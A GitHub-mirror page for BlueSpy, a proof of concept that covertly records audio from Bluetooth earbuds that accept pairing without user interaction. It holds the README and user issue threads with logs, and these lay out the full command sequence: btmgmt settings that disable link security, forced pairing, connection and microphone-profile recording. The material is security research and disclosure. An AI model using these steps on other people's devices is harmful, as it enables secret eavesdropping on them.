tarlogicsecurity / bluespy Goto Github PK

PoC to record audio from a Bluetooth device

Python 100.00%

bluetooth bluetooth-le bluetooth-low-energy

bluespy's Introduction

BlueSpy - PoC to record audio from a Bluetooth device

This repository contains the implementation of a proof of concept to record and replay audio from a bluetooth device without the legitimate user's awareness.

The PoC was demonstrated during the talk BSAM: Seguridad en Bluetooth at RootedCON 2024 in Madrid.

It's designed to raise awareness about the insecure use of Bluetooth devices, and the need of a consistent methodology for security evaluations. That's the purpose of BSAM, the Bluetooth Security Assessment Methodology, published by Tarlogic and available here.

This proof of concept exploits the failure to comply with the BSAM-PA-05 control within the BSAM methodology. Consequently, the device enables the pairing procedure without requiring user interaction and exposes its functionality to any agent within the signal range.

More information on our blog.

Requirements

The code is written in Python and has been tested with Python 3.11.8, but it mainly uses widely available tools in Linux systems.

The PoC uses the following tools:

bluetoothctl
btmgmt
pactl
parecord
paplay

In Arch Linux distributions, bluetoothctl and btmgmt can be installed with the package bluez-utils, while pactl, parecord and paplay are available in the libpulse package.

For the PoC to work, it is necessary to have a working installation of the BlueZ Bluetooth stack, available in the bluezpackage for Arch Linux distributions. A working installation of an audio server compatible with PulseAudio, such as PipeWire, is also required to record and play audio.

Setup

Ensure that your device is capable of functioning as an audio source, meaning it has a microphone, and that it is discoverable and connectable via Bluetooth.

For instance, to be discoverable and connectable, the earbuds used during the talk must be outside of their charging case. By default, they only activate the microphone when placed in the user's ears, although this setting can be adjusted in the configuration app.

Additionally, ensure that the device is not already connected, or alternatively, that it supports multiple connections.

Execution

Firstly, the address of the device must be discovered using a tool such as bluetoothctl:

$ bluetoothctl
[bluetooth]# scan on

Once the address of the device is discovered, the script can handle the rest:

$ python BlueSpy.py -a <address>

Note: The script might prompt for superuser permissions to modify the configuration of your BlueZ instance and pair it with the remote device.

Troubleshooting

BlueSpy.py is the main script that executes every step of the process. However, if you encounter issues with any of the phases, so it might be helpful to execute them individually:

pair.py utilizes the command-line tool btmgmt to modify the configuration of your BlueZ and initiate a pairing process with the remote device. The exact commands used are in the pair function inside core.py.
connect.py utilizes the command-line tool bluetoothctl to initiate a quick scan (necessary for BlueZ) and establish a connection to the device. The exact commands used are in the connect function inside core.py.
just_record.py utilizes the command-line tools pactl and parecord to search for the device in the system's audio sources (it must function as a microphone) and initiate a recording session. The exact commands used are in the record function inside core.py.
The playback function inside core.py executes paplay to play back the captured audio.

If you encounter issues with any of the phases, examine the commands in core.py and try to execute them in a shell. This will provide more information on what may be failing.

References

If you have any questions regarding how the Bluetooth standard operates or how to assess the security of a Bluetooth device, please refer to our BSAM methodology webpage:

BSAM: Bluetooth Security Assessment Methodology

bluespy's People

Contributors

Stargazers

Watchers

Forkers

90n20 ipallin javierolmedo 0d8k gavz c0c0red acevedocarles beerandgin valenciag titounkle tucommenceapousser hotelzululima martyd420 jakuta-tech emadyay killvxk dmore tomfansdwdf oyyunshen hevnsnt jabdy86 czenon1 fujohnwang apkunpacker tcattd binz120 psikosen delson704557 antoniovazquezblanco ethicalsecurity-agency 0xsojalsec vulnpire dariansweb k4mu5 shantanu561993 ericismyeldestson jyotidwi princeleonal lou-dev tonymm2331 robs68 chanjianhao jaratai rsttt morpheusc black-archivers ruggdoll gpapa8x jermainlaforce vman45 rnoyer dannymas hugo-prod tobey123 m-chandru autb ygrekconsutling mlbdesign centulus andrewmohawk sibylassana95 wumingzhilian orinocoz raghukamma fullpenetrationtesting 5l1v3r1 mirdinus notspepino beraoudabdelkhalek anaslachheb marcinoo97 ivangael hxlxmjxbbxs taoufik-b nocomp coderchintu 41exposition nanox jrelo tdohex indianapirate vvilerio exiahan

bluespy's Issues

Additionally, ensure that the device is not already connected, or alternatively, that it supports multiple connections.

What devices are affected with this issue ?

If a device is paired it's not vulnerable, and this attack is useless.
Because if it's not connected and you connect to some earbuds , well it's normal that you can record and play sound out of it
"or alternatively, that it supports multiple connections." is there any ?

Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

when i run bluespy.py,i got this error
Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

Pairing failed with status 0x11 (Invalid Index)

Hello,

my setup:

VMware -> Kali
USB Bluetooth dongle - https://fr.ugreen.com/products/ugreen-dongle-bluetooth-5-0-cle-usb-bluetooth
My 2nd dongle: https://www.amazon.fr/dp/B0CBK7WRPT?psc=1&ref=ppx_yo2ov_dt_b_product_details

I can discover it with bluetoothctl and connect to it with blueman-applet on my kali
But with btmgmt i get 0x11 (Invalid Index) with any peripheral

Any idea ?

┌──(kali㉿kali)-[~/Documents/BlueSpy]
└─$ sudo python BlueSpy.py -a 11:75:58:13:F1:DC
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with 11:75:58:13:F1:DC...
[I] Generating shared key...
Traceback (most recent call last):
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 67, in main
    paired = pair(target, verbose=args.verbose)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Documents/BlueSpy/core.py", line 90, in pair
    raise e
  File "/home/kali/Documents/BlueSpy/core.py", line 79, in pair
    run_and_check(
  File "/home/kali/Documents/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "sudo btmgmt pair -c 3 -t 0 11:75:58:13:f1:dc"', 'Pairing with 11:75:58:13:F1:DC (BR/EDR)\n\x1b[0;91mPairing failed with status 0x11 (Invalid Index)\n\x1b[0m')

┌──(kali㉿kali)-[~/Documents/BlueSpy]
└─$ sudo btmgmt pair -c 3 -t 0 11:75:58:13:f1:dc
Pairing with 11:75:58:13:F1:DC (BR/EDR)
Pairing failed with status 0x11 (Invalid Index)

Bluez error

Hi guys
I'm facing this issue on kali nethunter
[!] Key generated
[I] The device is vulnerable!
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
SetDiscoveryFilter success
hci0 type 7 discovering on
Discovery started
[CHG] Controller 64:A2:F9:BD:AB:92 Discovering: yes
[NEW] Device 64:5E:9F:B9:D5:54 64-5E-9F-B9-D5-54
hci0 4C:72:74:90:0A:D8 type BR/EDR disconnected with reason 2
[CHG] Device 4C:72:74:90:0A:D8 Paired: no
[CHG] Device 4C:72:74:90:0A:D8 Connected: no

[C] bluetoothctl connect 4c:72:74:90:0a:d8
Attempting to connect to 4c:72:74:90:0a:d8
Failed to connect: org.bluez.Error.Failed br-connection-profile-unavailable

Traceback (most recent call last):
File "/root/BlueSpy/BlueSpy.py", line 94, in
main()
File "/root/BlueSpy/BlueSpy.py", line 78, in main
connect(target, verbose=args.verbose)
File "/root/BlueSpy/core.py", line 97, in connect
run_and_check(
File "/root/BlueSpy/system.py", line 35, in run_and_check
raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "bluetoothctl connect 4c:72:74:90:0a:d8"', 'Attempting to connect to 4c:72:74:90:0a:d8\nFailed to connect: org.bluez.Error.Failed br-connection-profile-unavailable\n')

It works like charm on kali installed on my computer.
Thanks

Error while executing command "bluetoothctl connect XX:XX:XX:XX:XX:XX"

XX:XX:XX:XX:XX:XX is my Phone MAC

┌──(kali㉿kali-raspberry-pi)-[~/Desktop/P_tools/BlueSpy]
└─$ python3 BlueSpy.py -a XX:XX:XX:XX:XX:XX
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:XX:XX...
[I] Generating shared key...
[!] Key generated
[I] The device is vulnerable!
[I] Establishing connection...
Traceback (most recent call last):
  File "/home/kali/Desktop/P_tools/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/home/kali/Desktop/P_tools/BlueSpy/BlueSpy.py", line 78, in main
    connect(target, verbose=args.verbose)
  File "/home/kali/Desktop/P_tools/BlueSpy/core.py", line 97, in connect
    run_and_check(
  File "/home/kali/Desktop/P_tools/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "bluetoothctl connect XX:XX:XX:XX:XX:XX"', 'Attempting to connect to XX:XX:XX:XX:XX:XX\n[\x1b[0;92mNEW\x1b[0m] Endpoint /org/bluez/hci0/dev_XX_XX_XX_XX_XX_XX/sep1 \n[\x1b[0;92mNEW\x1b[0m] Transport /org/bluez/hci0/dev_XX_XX_XX_XX_XX_XX/sep1/fd0 \nFailed to connect: org.bluez.Error.Failed br-connection-unknown\n')

Exception while executing command

From @arobase-che :

Same problem. Here is the result with -v but I tried it on my phone instead of my earbuds (didn't read enough):

░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:CA:FE...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:CA:FE
Pairing with XX:XX:XX:XX:CA:FE (BR/EDR)
hci0 XX:XX:XX:XX:CA:FE type BR/EDR connected eir_len 20
hci0 new_link_key XX:XX:XX:XX:CA:FE type 0x07 pin_len 0 store_hint 0
Paired with XX:XX:XX:XX:CA:FE (BR/EDR)

[!] Key generated
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
SetDiscoveryFilter success
Discovery started
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: yes
[NEW] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Modalias: bluetooth:v0075p0100d0201
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx05-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0a-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0c-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0e-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx12-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx15-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx16-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx1f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2d-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx32-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx01-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx55-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE ServicesResolved: yes
[CHG] Device XX:XX:XX:XX:CA:FE Paired: yes

[C] bluetoothctl connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
[CHG] Device XX:XX:XX:XX:F0:0D TxPower is nil
[CHG] Device XX:XX:XX:XX:F0:0D RSSI is nil
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: no
Failed to connect: org.bluez.Error.Failed br-connection-unknown

[I] Starting audio recording...
[!] Recording!
[C] pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 77, in main
    record(target, outfile=args.outfile, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 128, in record
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc', '')

On my phone, I had a quick flash notification unable to pair.

Trying to get more information by adding the -m flag to bluetoothctl then relaunching the script (only the interesting part):

[C] bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Unable to open logging channel
Attempting to connect to XX:XX:XX:XX:CA:FE
[DEL] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Connected: yes
Failed to connect: org.bluez.Error.Failed br-connection-unknown

Humm ... Don't know why. sudo maybe ? >_<"

[C] sudo bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
hci0 device_flags_changed: 80:07:94:3C:B5:C6 (BR/EDR)
     supp: 0x00000001  curr: 0x00000000
Failed to connect: org.bluez.Error.Failed br-connection-unknown

Nope.

I tried remove XX:XX:XX:XX:CA:FE in bluetoothctl didn't work.

Using on my earbuds (with microphones):

░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:F0:0D...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)
hci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 67, in main
    pair(target, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D', 'Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)\nhci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)\n\x1b[0;91mPairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)\n\x1b[0m')

-m doesn't display more information.

I feel a little safer but still concern. Will try with another pair in two weeks.

Originally posted by @arobase-che in #1 (comment)

BR/EDR) failed. status 0x05 (Authentication Failed)

Hello,

I'm trying with bose QC35 and RPI4 with kali.
The QC35 is connected with a laptop and can playing sound.

[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
Traceback (most recent call last):
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 89, in
main()
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 69, in main
pair(BluezTarget(args.address, args.address_type), verbose=False)
File "/home/kali/sources/BlueSpy/core.py", line 95, in pair
run_and_check(
File "/home/kali/sources/BlueSpy/core.py", line 73, in run_and_check
raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)\n\x1b[0m')

Update output with -v option:

I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)

Traceback (most recent call last):
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 97, in
main()
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 77, in main
pair(BluezTarget(args.address, args.address_type), verbose=args.verbose)
File "/home/kali/sources/BlueSpy/core.py", line 95, in pair
run_and_check(
File "/home/kali/sources/BlueSpy/core.py", line 73, in run_and_check
raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)\n\x1b[0m')

Manually:
└─$ sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)